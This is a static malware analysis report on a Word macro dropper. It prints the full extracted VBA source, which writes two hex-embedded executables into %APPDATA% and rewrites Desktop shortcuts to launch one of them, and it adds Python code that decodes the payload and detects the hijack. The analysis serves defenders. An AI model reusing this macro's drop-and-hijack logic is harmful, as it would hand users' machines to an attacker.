Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a4276750a825c73f…

MALICIOUS

Office (OLE)

Size: 386.5 KB
Created: 2018-11-29 10:45:00
Authoring application: Microsoft Office Word
First seen: 2019-01-12
MD5: 9aff54da8d88f6794ce900fd3bf2ad62
SHA-1: f403fa334c8804020b9a2f1620ca6a251c34827c
SHA-256: a4276750a825c73f465bf67672b06f19613db82c047f9c0daa7c971c1d231fac
Risk score: 418

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample triggers the critical OLE_VBA_SHELL heuristic (matched on a Shell32.Shell COM declaration, which the macro uses to open and rewrite .lnk files through ShellLinkObject, not on a VBA Shell() process launch) and the critical OLE_VBA_WSCRIPT heuristic (WScript.Shell, used only to resolve the Desktop folder). Document_Open acts only if '%APPDATA%\lkn' does not yet exist (a first-run marker): it decodes the hex strings held in UserForm1.TextBox1 and UserForm2.TextBox1 with HexToString, writes them to '%APPDATA%\werd.exe' and '%APPDATA%\wird.exe', and calls finds(). finds() creates '%APPDATA%\lkn', moves every *.lnk from C:\users\public\desktop into that folder and copies them onto the user's Desktop, then for each *.lnk on the Desktop keeps a backup in '%APPDATA%\lkn' and calls MakeShortcut. MakeShortcut recovers the original target executable path from the .lnk (by inserting the file into the document and reading it back through the clipboard) and rewrites the Desktop shortcut so that its target is '%APPDATA%\wird.exe', its arguments are the original executable's file name and the path of the backed-up .lnk, and its icon is the original executable, so the shortcut looks unchanged. Finally the macro wipes the document body, saves it as a macro-free .docx (wdFormatXMLDocument) and quits Word. This is a dropper with embedded payloads plus shortcut hijacking for user-triggered execution; only wird.exe is referenced by the rewritten shortcuts (werd.exe is dropped but never used by the macro itself), and no download routine is present in the recovered source, so the T1105 tag is not corroborated by the visible macro code.
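The two payloads never cross the network: they sit as hex text in the UserForm TextBox controls and are rebuilt by HexToString two characters at a time. The following is an added example (Python, not code from the sample or the analysis tool) that reproduces that decode so the dropped files can be carved and hashed from the document without executing it. The TextBox values themselves come from the UserForm streams (olevba lists them as form strings); the hex string used here is a constructed minimal MZ/PE header, not the real payload. Two caveats the macro's own code implies: `Print #1` appends CR LF, so the file on disk is two bytes longer than the decoded payload, and VBA `Chr$()` maps values 128 to 255 through the ANSI code page, so on some locales the bytes written can differ from the hex; hash both forms rather than assuming they match.

```python
"""Re-create the dropper's HexToString decode and triage the result.

Added example (not the sample's code). Feed it the hex text recovered from
UserForm1.TextBox1 / UserForm2.TextBox1 to obtain what the macro writes to
%APPDATA%\\werd.exe and %APPDATA%\\wird.exe.
"""
import hashlib
import struct


def val_hex(chunk: str) -> int:
    """Emulate VBA Val("&H" & chunk): parse leading hex digits, 0 if there are none."""
    digits = ""
    for ch in chunk:
        if ch in "0123456789abcdefABCDEF":
            digits += ch
        else:
            break
    return int(digits, 16) if digits else 0


def hex_to_string_like_macro(hex_text: str) -> bytes:
    """Mirror HexToString(): two characters per step, Chr$(Val("&H" & pair)).

    The macro validates nothing: a non-hex pair becomes 0x00 and an odd trailing
    nibble is taken as a one-digit value, so garbage in the TextBox silently
    corrupts the dropped file instead of aborting.
    """
    return bytes(val_hex(hex_text[i:i + 2]) for i in range(0, len(hex_text), 2))


def dropped_file_bytes(hex_text: str) -> bytes:
    """What lands on disk: Print #1 appends CR LF to the decoded string."""
    return hex_to_string_like_macro(hex_text) + b"\r\n"


def looks_like_pe(data: bytes) -> bool:
    """MZ signature plus a PE\\0\\0 signature at e_lfanew (offset 0x3C)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def triage_payload(hex_text: str) -> dict:
    """Summarise a decoded TextBox payload the way an analyst would record it."""
    decoded = hex_to_string_like_macro(hex_text)
    on_disk = dropped_file_bytes(hex_text)
    return {
        "decoded_size": len(decoded),
        "on_disk_size": len(on_disk),
        "is_pe": looks_like_pe(decoded),
        "sha256_decoded": hashlib.sha256(decoded).hexdigest(),
        "sha256_on_disk": hashlib.sha256(on_disk).hexdigest(),
    }


# Constructed stand-in for a TextBox value: a minimal MZ/PE header, not the real payload.
FAKE_PE = b"MZ" + b"\x00" * 58 + struct.pack("<I", 64) + b"PE\x00\x00" + b"\x00" * 16
SAMPLE_TEXTBOX_HEX = FAKE_PE.hex().upper()

if __name__ == "__main__":
    for key, value in triage_payload(SAMPLE_TEXTBOX_HEX).items():
        print(f"{key}: {value}")
```

The `sha256_on_disk` value is the one to match against files recovered from an infected host, since that is the form the macro actually writes; `sha256_decoded` identifies the payload as embedded in the document.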

Heuristics 12

  • ClamAV: Doc.Dropper.Agent-6835537-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6835537-0
  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA (the match is a Shell32.Shell COM declaration, which the macro uses to open and rewrite .lnk files through ShellLinkObject; no VBA Shell() process launch appears in the recovered source)
    Matched line in script
    Dim shell As Shell32.shell
    Dim folder As Shell32.folder
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Dim oWsh
    Set oWsh = CreateObject("WScript.Shell")
    strDirPath = oWsh.SpecialFolders("Desktop")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim oWsh
    Set oWsh = CreateObject("WScript.Shell")
    strDirPath = oWsh.SpecialFolders("Desktop")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Function ClipboardText()
        With GetObject("New:{1C3B4210-F441-11CE-B9EA-00AA006B1A69}")
            .GetFromClipboard
  • VBA instantiates a COM class by raw CLSID high OLE_VBA_GETOBJECT_CLSID_EVASION
    VBA uses GetObject("new:{CLSID}") to instantiate a COM class by raw CLSID rather than a CreateObject ProgID, an uncommon bypass of name-based macro detection. Here the CLSID is MSForms.DataObject, which ClipboardText() uses to read the clipboard after the macro has copied the inserted .lnk contents.
    Matched line in script
    Function ClipboardText()
        With GetObject("New:{1C3B4210-F441-11CE-B9EA-00AA006B1A69}")
            .GetFromClipboard
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Option Explicit
    Private Sub Document_Open()
    On Error Resume Next
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    gdffs = Environ("APPDATA") & "\"
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All seven below are XML namespace URIs from the document's metadata (XMP and Office Open XML schemas), not network indicators.
    • http://ns.adobe.com/xap/1.0/ [In document text (OLE body)]
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# [In document text (OLE body)]
    • http://ns.adobe.com/xap/1.0/mm/ [In document text (OLE body)]
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# [In document text (OLE body)]
    • http://schemas.openxmlformats.org/drawingml/2006/main [In document text (OLE body)]
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography [In document text (OLE body)]
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml [In document text (OLE body)]

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5152 bytes
SHA-256: bb3525f99b42e412867b4d7e4427539c32a20765e1c36aff3db9ac1ebacdaede
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Sub Document_Open()
On Error Resume Next
Dim gdffs

gdffs = Environ("APPDATA") & "\"

 If Dir(gdffs & "lkn", vbDirectory) = "" Then
                Open gdffs & "werd.exe" For Output As #1
    Print #1, HexToString(UserForm1.TextBox1.text)
    Close #1
    
          Open gdffs & "wird.exe" For Output As #1
    Print #1, HexToString(UserForm2.TextBox1.text)
       Close #1
    Call finds
    Else

    End If
    
   
   End Sub


Sub finds()
On Error Resume Next
Dim strDirPath, strMaskSearch, strFileName As String
Dim oWsh
Set oWsh = CreateObject("WScript.Shell")
strDirPath = oWsh.SpecialFolders("Desktop")
strMaskSearch = "*.lnk*"


Dim s As String, s2 As String

    s = Environ("APPDATA") & "\lkn"

      MkDir s

Dim fso As Object
Set fso = VBA.CreateObject("Scripting.FileSystemObject")




Dim gdffs, iStr1

gdffs = Environ("APPDATA")
 iStr1 = Left(gdffs, 3) & "users\public\desktop"
strFileName = Dir(iStr1 & "/" & strMaskSearch)

Do While strFileName <> ""


FileCopy iStr1 & "\" & strFileName, s & "\" & strFileName
     Kill iStr1 & "\" & strFileName
FileCopy s & "\" & strFileName, strDirPath & "\" & strFileName

    strFileName = Dir
Loop






strFileName = Dir(strDirPath & "/" & strMaskSearch)

Do While strFileName <> ""


FileCopy oWsh.SpecialFolders("Desktop") & "\" & strFileName, s & "\" & strFileName
Call MakeShortcut(strFileName, strFileName, s & "\" & strFileName, oWsh.SpecialFolders("Desktop"))
  ' MsgBox strFileName

    strFileName = Dir
Loop
    Selection.WholeStory
    Selection.Copy
  Selection.TypeBackspace
  ActiveDocument.Save
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument
Application.Quit
End Sub

Sub MakeShortcut(pod, gfdgd, jojj, hhhhh)
Dim a, b, c, f, pos, pis, pas, pus, ppp, txt

Selection.InsertFile FileName:=jojj, Range:="", _
        ConfirmConversions:=False, Link:=False, Attachment:=False

    Selection.WholeStory
    Selection.Copy
  Selection.TypeBackspace
    txt = ClipboardText


   Dim sss, aaa, aaaa, ssss, aa, aas, aad
    
    ssss = InStr(1, txt, ":\")
    aaaa = InStr(ssss + 5, txt, ":\")
    aa = Mid(txt, aaaa - 1)
    aas = Left(aa, 100)
    sss = InStr(1, aas, ".exe")
    aad = Left(aa, sss + 3)


Dim kkk, xxx, ccc, vvv, bbb, nnn

kkk = InStr(sss - 20, aad, "\")

xxx = InStr(kkk + 1, aad, "\")


If xxx <> 0 Then
ccc = Mid(aad, xxx + 1)

Else
ccc = Mid(aad, kkk + 1)

End If

Dim oWsh
Dim myshortcut
Dim oShortcut
Dim strSplitFileName
Dim strTarget
Dim nShortName, strDirPath

Set oWsh = CreateObject("WScript.Shell")

strDirPath = oWsh.SpecialFolders("Desktop")


     Dim fsdf As String
     fsdf = Environ("APPDATA") & "\wird.exe"




   Dim shell As Shell32.shell
    Dim folder As Shell32.folder
    Dim folderItem As Shell32.folderItem
    Dim shortcut As Shell32.ShellLinkObject
    
    Set shell = New Shell32.shell
    
    Set folder = shell.NameSpace(strDirPath)
    If Not folder Is Nothing Then
        Set folderItem = folder.ParseName(pod)
        If Not folderItem Is Nothing Then
            Set shortcut = folderItem.GetLink
            If Not shortcut Is Nothing Then
                shortcut.Path = fsdf
        
 

   shortcut.Arguments = """" & ccc & """" & " " & """" & jojj & """"
                shortcut.SetIconLocation aad, 0
                 shortcut.Save
            End If
        End If
    End If
    
    
    

Set oWsh = Nothing
Set oShortcut = Nothing




End Sub

Function ClipboardText()
    With GetObject("New:{1C3B4210-F441-11CE-B9EA-00AA006B1A69}")
        .GetFromClipboard
        ClipboardText = .GetText
    End With
End Function


Public Function HexToString(ByVal HexToStr As String) As String

Dim strTemp   As String
Dim strReturn As String
Dim i As Long

For i = 1 To Len(HexToStr) Step 2
    strTemp = Chr$(Val("&H" & Mid$(HexToStr, i, 2)))
    strReturn = strReturn & strTemp
Next i
HexToString = Right(strReturn, Len(strReturn))
End Function

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{D4012650-63C5-41D6-8B42-E7B39DC07E9F}{237B9DEB-AFBC-460D-9108-01D0545B5156}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()

End Sub

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{096E98AB-906D-43A3-8701-596010F89713}{C721879D-BB87-4E9E-80BF-C5773C6DAD97}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
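The shortcut hijack in finds() and MakeShortcut() is the part of this macro worth modelling, because it determines what an infected Desktop looks like afterwards. The following is an added example (Python, not the sample's code or the analysis tool's output): it re-implements MakeShortcut's string surgery with 1-based VBA-style helpers so the fields written to each Desktop .lnk can be predicted from the path strings inside the shortcut, and it includes a check that flags a shortcut of that shape. The .lnk text, user name and paths are constructed stand-ins; a real .lnk is messier (which is partly why any parse error simply makes the caller's On Error Resume Next skip that shortcut). On a live host the same Path, Arguments and IconLocation fields are read with WScript.Shell CreateShortcut or the Shell32 GetLink the macro itself uses.

```python
"""Model the .lnk hijack performed by finds() and MakeShortcut().

Added example (Python, not the sample's code): re-implements the macro's
string surgery with VBA-style 1-based helpers so the fields written to each
Desktop shortcut can be predicted, and flags shortcuts of that shape.
All paths and the .lnk text below are constructed.
"""
import ntpath
from typing import Optional


def instr(start: int, s: str, sub: str) -> int:
    """VBA InStr(start, s, sub): 1-based; 0 when absent; runtime error when start < 1."""
    if start < 1:
        raise ValueError("InStr: start must be >= 1")
    idx = s.find(sub, start - 1)
    return 0 if idx < 0 else idx + 1


def mid(s: str, start: int, length: Optional[int] = None) -> str:
    """VBA Mid(s, start[, length]): 1-based; runtime error when start < 1."""
    if start < 1:
        raise ValueError("Mid: start must be >= 1")
    return s[start - 1:] if length is None else s[start - 1:start - 1 + length]


def left(s: str, n: int) -> str:
    """VBA Left(s, n)."""
    return s[:n]


def parse_target_like_macro(txt: str) -> tuple:
    """Return (aad, ccc): the original target's full path and its file name.

    MakeShortcut skips the first drive-letter path in the .lnk text, takes the
    second one up to the first ".exe", then isolates the file name after the
    last backslash found within 20 characters before ".exe". The macro has no
    error handling here, so any error propagates to finds(), whose
    On Error Resume Next leaves that shortcut untouched.
    """
    ssss = instr(1, txt, ":\\")
    aaaa = instr(ssss + 5, txt, ":\\")
    aa = mid(txt, aaaa - 1)
    aas = left(aa, 100)
    sss = instr(1, aas, ".exe")
    aad = left(aa, sss + 3)
    kkk = instr(sss - 20, aad, "\\")
    xxx = instr(kkk + 1, aad, "\\")
    ccc = mid(aad, xxx + 1) if xxx != 0 else mid(aad, kkk + 1)
    return aad, ccc


def macro_would_skip(txt: str) -> bool:
    """True when the parse errors out, e.g. ".exe" fewer than 21 chars into the path."""
    try:
        parse_target_like_macro(txt)
    except ValueError:
        return True
    return False


def hijacked_shortcut(lnk_text: str, lnk_name: str, appdata: str, desktop: str) -> dict:
    """Fields MakeShortcut writes through Shell32 ShellLinkObject for one Desktop .lnk."""
    aad, ccc = parse_target_like_macro(lnk_text)
    backup = ntpath.join(appdata, "lkn", lnk_name)   # jojj: the copy kept in %APPDATA%\lkn
    return {
        "lnk": ntpath.join(desktop, lnk_name),
        "Path": ntpath.join(appdata, "wird.exe"),     # fsdf
        "Arguments": f'"{ccc}" "{backup}"',           # original exe name + backed-up .lnk
        "IconLocation": f"{aad},0",                   # SetIconLocation aad, 0
    }


def looks_hijacked(shortcut: dict, appdata: str) -> bool:
    """Hunt rule for this shape: target under %APPDATA%, icon borrowed from
    somewhere else, and a .lnk path smuggled into the arguments."""
    prefix = appdata.lower().rstrip("\\") + "\\"
    target = shortcut["Path"].lower()
    icon = shortcut["IconLocation"].rsplit(",", 1)[0].lower()
    return (target.startswith(prefix)
            and not icon.startswith(prefix)
            and ".lnk" in shortcut["Arguments"].lower())


# Constructed .lnk text: stand-in for the path strings a shortcut carries, as the
# macro would see them after Selection.InsertFile and the clipboard round trip.
APPDATA = r"C:\Users\victim\AppData\Roaming"
DESKTOP = r"C:\Users\victim\Desktop"
SAMPLE_LNK_TEXT = (
    "L\x00\x00\x00" + DESKTOP + "\x00"                      # first drive path: skipped
    + r"C:\Program Files\Vendor\app.exe" + "\x00"          # second: the real target
    + r"C:\Program Files\Vendor" + "\x00"                  # working directory
)

if __name__ == "__main__":
    result = hijacked_shortcut(SAMPLE_LNK_TEXT, "App.lnk", APPDATA, DESKTOP)
    for key, value in result.items():
        print(f"{key}: {value}")
    print("hijacked:", looks_hijacked(result, APPDATA))
```

The 20-character window before ".exe" is a quirk worth noting when hunting: a target like C:\b\c.exe makes `InStr` start below 1, the error is swallowed by finds(), and that shortcut is left intact, so a host can show a mix of hijacked and untouched shortcuts side by side.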